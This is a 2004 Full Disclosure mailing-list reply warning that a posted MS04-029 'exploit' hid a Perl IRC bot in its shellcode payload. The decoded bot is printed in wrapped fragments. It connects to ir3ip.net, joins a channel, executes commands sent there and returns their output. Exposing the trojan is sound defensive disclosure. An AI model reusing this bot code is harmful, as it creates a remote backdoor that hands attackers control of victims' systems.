Full Disclosure mailing list archives
RE: New Remote Windows Exploit (MS04-029)
From: "Todd Towles" <toddtowles () brookshires com>
Date: Wed, 3 Nov 2004 21:00:47 -0600
Yep, Dave pointed that out really fast...
-----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of Barrie Dempster Sent: Wednesday, November 03, 2004 3:19 PM To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] New Remote Windows Exploit (MS04-029) Excellent exploit, I'm sure no one will spot that perl IRC bot in there, nope no one will see that... (hint for the readers, try looking at the ascii out put of the "char *shellcode_payload=" data, looks a little like the following....) [code] #!/usr/bin/perl $c han="#0x";$nick="k ";$server="ir3ip.n et";$SIG{TERM}={}; exit if fork;use I O::Socket;$sock = IO::Socket::INET-> new($server.":6667 ")||exit;print $so ck "USER k +i k :k v1\nNICK k\n";$i=1 ;while(<$sock>=~/^ [^ ]+ ([^ ]+) /){$ mode=$1;last if $m ode=="001";if($mod e=="433"){$i++;$ni ck=~s/\d*$/$i/;pri nt $sock "NICK $ni ck\n";}}print $soc k "JOIN $chan\nPRI VMSG $chan :Hi\n"; while(<$sock>){if (/^PING (.*)$/){pr int $sock "PONG $1 \nJOIN $chan\n";}i f(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\ w]*:[^ :\w]* (.*)$ /$1/){s/\s*$//;$_= `$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$ _\n";sleep 1;}}}#/ tmp/hi [/code] -- Barrie Dempster (zeedo) - Fortiter et Strenue http://www.bsrf.org.uk [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: New REmote Windows Exploit (MS04-029), (continued)
- RE: New REmote Windows Exploit (MS04-029) raza (Nov 03)
- Re: New REmote Windows Exploit (MS04-029) DanB UK (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Ferdinand Klinzer (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Vincent Archer (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Ferdinand Klinzer (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Steve Hulshof (Nov 04)
- RE: New REmote Windows Exploit (MS04-029) raza (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) KF_lists (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Michael Riedel (Nov 04)
- Re: New REmote Windows Exploit (MS04-029) Valdis . Kletnieks (Nov 04)
- RE: New REmote Windows Exploit (MS04-029) raza (Nov 03)
- RE: New REmote Windows Exploit (MS04-029) Barrie Dempster (Nov 04)